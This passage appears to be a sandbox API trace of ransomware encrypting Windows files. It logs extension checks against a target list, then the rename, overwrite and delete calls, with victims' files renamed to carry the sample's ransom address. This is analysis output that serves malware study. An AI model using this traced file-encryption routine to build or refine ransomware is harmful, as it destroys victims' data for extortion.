(lpString1=".1cd", lpString2=".EXE") returned -1 [0051.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.541] lstrlenW (lpString=".jpg") returned 4 [0051.541] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.541] lstrlenW (lpString=".doc") returned 4 [0051.541] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.541] lstrlenW (lpString=".docx") returned 5 [0051.541] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0051.541] lstrlenW (lpString=".pdf") returned 4 [0051.541] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.541] lstrlenW (lpString=".xls") returned 4 [0051.541] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.542] lstrlenW (lpString=".xlsx") returned 5 [0051.542] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0051.542] lstrlenW (lpString=".ppt") returned 4 [0051.542] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.542] lstrlenW (lpString=".zip") returned 4 [0051.542] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.542] lstrlenW (lpString=".rar") returned 4 [0051.542] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.542] lstrlenW (lpString=".bz2") returned 4 [0051.542] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.542] lstrlenW (lpString=".7z") returned 3 [0051.542] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.542] lstrlenW (lpString=".dbf") returned 4 [0051.542] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.542] lstrlenW (lpString=".1cd") returned 4 [0051.542] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0051.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.542] lstrlenW (lpString=".jpg") returned 4 [0051.542] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.542] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0051.542] lstrlenW (lpString="VISFILT.DLL") returned 11 [0051.542] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0052.507] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=2124664) returned 1 [0052.507] CloseHandle (hObject=0x214) returned 1 [0052.507] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll")) returned 0x20 [0052.507] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0052.507] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0052.570] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0052.570] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0x0) returned 1 [0052.570] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.570] ReadFile (in: hFile=0x214, lpBuffer=0x3650058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3650058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.574] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xace7d, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.574] ReadFile (in: hFile=0x214, lpBuffer=0x3690058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3690058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.577] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0052.577] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x1c6b78, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.577] ReadFile (in: hFile=0x214, lpBuffer=0x36d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x36d0058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.598] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.598] WriteFile (in: hFile=0x214, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2b3fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0052.721] SetEndOfFile (hFile=0x214) returned 1 [0052.721] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x4042520 [0052.724] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.724] WriteFile (in: hFile=0x214, lpBuffer=0x4042520*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x4042520*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.726] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xace7d, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.726] WriteFile (in: hFile=0x214, lpBuffer=0x4042520*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x4042520*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.727] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x1c6b78, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.727] WriteFile (in: hFile=0x214, lpBuffer=0x4042520*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x4042520*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.729] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.729] CloseHandle (hObject=0x214) returned 1 [0052.729] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0052.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.729] lstrlenW (lpString=".doc") returned 4 [0052.729] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0052.729] lstrlenW (lpString=".docx") returned 5 [0052.729] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0052.729] lstrlenW (lpString=".pdf") returned 4 [0052.729] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0052.729] lstrlenW (lpString=".xls") returned 4 [0052.729] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0052.729] lstrlenW (lpString=".xlsx") returned 5 [0052.729] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0052.729] lstrlenW (lpString=".ppt") returned 4 [0052.729] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0052.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.730] lstrlenW (lpString=".zip") returned 4 [0052.730] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0052.730] lstrlenW (lpString=".rar") returned 4 [0052.730] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0052.730] lstrlenW (lpString=".bz2") returned 4 [0052.730] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0052.730] lstrlenW (lpString=".7z") returned 3 [0052.730] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0052.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.730] lstrlenW (lpString=".dbf") returned 4 [0052.730] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0052.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.730] lstrlenW (lpString=".1cd") returned 4 [0052.730] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0052.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.730] lstrlenW (lpString=".jpg") returned 4 [0052.730] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0052.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.730] lstrlenW (lpString=".doc") returned 4 [0052.730] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0052.730] lstrlenW (lpString=".docx") returned 5 [0052.730] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0052.730] lstrlenW (lpString=".pdf") returned 4 [0052.730] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0052.730] lstrlenW (lpString=".xls") returned 4 [0052.730] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0052.730] lstrlenW (lpString=".xlsx") returned 5 [0052.730] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0052.730] lstrlenW (lpString=".ppt") returned 4 [0052.730] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0052.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.730] lstrlenW (lpString=".zip") returned 4 [0052.730] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0052.730] lstrlenW (lpString=".rar") returned 4 [0052.730] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0052.731] lstrlenW (lpString=".bz2") returned 4 [0052.731] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0052.731] lstrlenW (lpString=".7z") returned 3 [0052.731] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0052.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.731] lstrlenW (lpString=".dbf") returned 4 [0052.731] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0052.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.731] lstrlenW (lpString=".1cd") returned 4 [0052.731] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0052.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0052.731] lstrlenW (lpString=".jpg") returned 4 [0052.731] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0052.731] lstrcmpiW (lpString1=".FLT", lpString2=".dqb") returned 1 [0052.731] lstrlenW (lpString="EPSIMP32.FLT") returned 12 [0052.731] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.145] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=712592) returned 1 [0053.145] CloseHandle (hObject=0x224) returned 1 [0053.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt")) returned 0x20 [0053.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.145] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.145] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0053.146] GetLastError () returned 0x0 [0053.146] ReadFile (in: hFile=0x224, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0xadf90, lpOverlapped=0x0) returned 1 [0053.159] WriteFile (in: hFile=0x234, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xadfa0, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xadfa0, lpOverlapped=0x0) returned 1 [0053.171] ReadFile (in: hFile=0x224, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.171] WriteFile (in: hFile=0x234, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.171] SetEndOfFile (hFile=0x234) returned 1 [0053.171] CloseHandle (hObject=0x234) returned 1 [0053.172] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.172] SetEndOfFile (hFile=0x224) returned 1 [0053.177] CloseHandle (hObject=0x224) returned 1 [0053.177] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.178] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt")) returned 1 [0053.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.178] lstrlenW (lpString=".doc") returned 4 [0053.178] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.178] lstrlenW (lpString=".docx") returned 5 [0053.178] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.178] lstrlenW (lpString=".pdf") returned 4 [0053.178] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.178] lstrlenW (lpString=".xls") returned 4 [0053.178] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.178] lstrlenW (lpString=".xlsx") returned 5 [0053.178] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.178] lstrlenW (lpString=".ppt") returned 4 [0053.178] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.178] lstrlenW (lpString=".zip") returned 4 [0053.178] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.178] lstrlenW (lpString=".rar") returned 4 [0053.178] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.178] lstrlenW (lpString=".bz2") returned 4 [0053.178] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.178] lstrlenW (lpString=".7z") returned 3 [0053.178] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.178] lstrlenW (lpString=".dbf") returned 4 [0053.178] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.178] lstrlenW (lpString=".1cd") returned 4 [0053.179] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.179] lstrlenW (lpString=".jpg") returned 4 [0053.179] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.179] lstrlenW (lpString=".doc") returned 4 [0053.179] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.179] lstrlenW (lpString=".docx") returned 5 [0053.179] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.179] lstrlenW (lpString=".pdf") returned 4 [0053.179] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.179] lstrlenW (lpString=".xls") returned 4 [0053.179] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.179] lstrlenW (lpString=".xlsx") returned 5 [0053.179] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.179] lstrlenW (lpString=".ppt") returned 4 [0053.179] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.179] lstrlenW (lpString=".zip") returned 4 [0053.179] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.179] lstrlenW (lpString=".rar") returned 4 [0053.179] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.179] lstrlenW (lpString=".bz2") returned 4 [0053.179] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.179] lstrlenW (lpString=".7z") returned 3 [0053.179] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.179] lstrlenW (lpString=".dbf") returned 4 [0053.179] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.179] lstrlenW (lpString=".1cd") returned 4 [0053.179] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.179] lstrlenW (lpString=".jpg") returned 4 [0053.180] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.180] lstrcmpiW (lpString1=".WPG", lpString2=".dqb") returned 1 [0053.180] lstrlenW (lpString="MS.WPG") returned 6 [0053.180] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.180] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=1382) returned 1 [0053.180] CloseHandle (hObject=0x224) returned 1 [0053.180] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg")) returned 0x20 [0053.180] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.180] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.180] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.180] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.180] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0053.181] GetLastError () returned 0x0 [0053.181] ReadFile (in: hFile=0x224, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x566, lpOverlapped=0x0) returned 1 [0053.321] WriteFile (in: hFile=0x234, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0x570, lpOverlapped=0x0) returned 1 [0053.322] ReadFile (in: hFile=0x224, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.322] WriteFile (in: hFile=0x234, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0053.322] SetEndOfFile (hFile=0x234) returned 1 [0053.322] CloseHandle (hObject=0x234) returned 1 [0053.323] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.323] SetEndOfFile (hFile=0x224) returned 1 [0053.323] CloseHandle (hObject=0x224) returned 1 [0053.323] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.324] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg")) returned 1 [0053.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0053.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0053.324] lstrlenW (lpString=".doc") returned 4 [0053.324] lstrcmpiW (lpString1=".doc", lpString2=".WPG") returned -1 [0053.324] lstrlenW (lpString=".docx") returned 5 [0053.324] lstrcmpiW (lpString1=".docx", lpString2="S.WPG") returned -1 [0053.324] lstrlenW (lpString=".pdf") returned 4 [0053.324] lstrcmpiW (lpString1=".pdf", lpString2=".WPG") returned -1 [0053.324] lstrlenW (lpString=".xls") returned 4 [0053.324] lstrcmpiW (lpString1=".xls", lpString2=".WPG") returned 1 [0053.324] lstrlenW (lpString=".xlsx") returned 5 [0053.324] lstrcmpiW (lpString1=".xlsx", lpString2="S.WPG") returned -1 [0053.324] lstrlenW (lpString=".ppt") returned 4 [0053.324] lstrcmpiW (lpString1=".ppt", lpString2=".WPG") returned -1 [0053.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 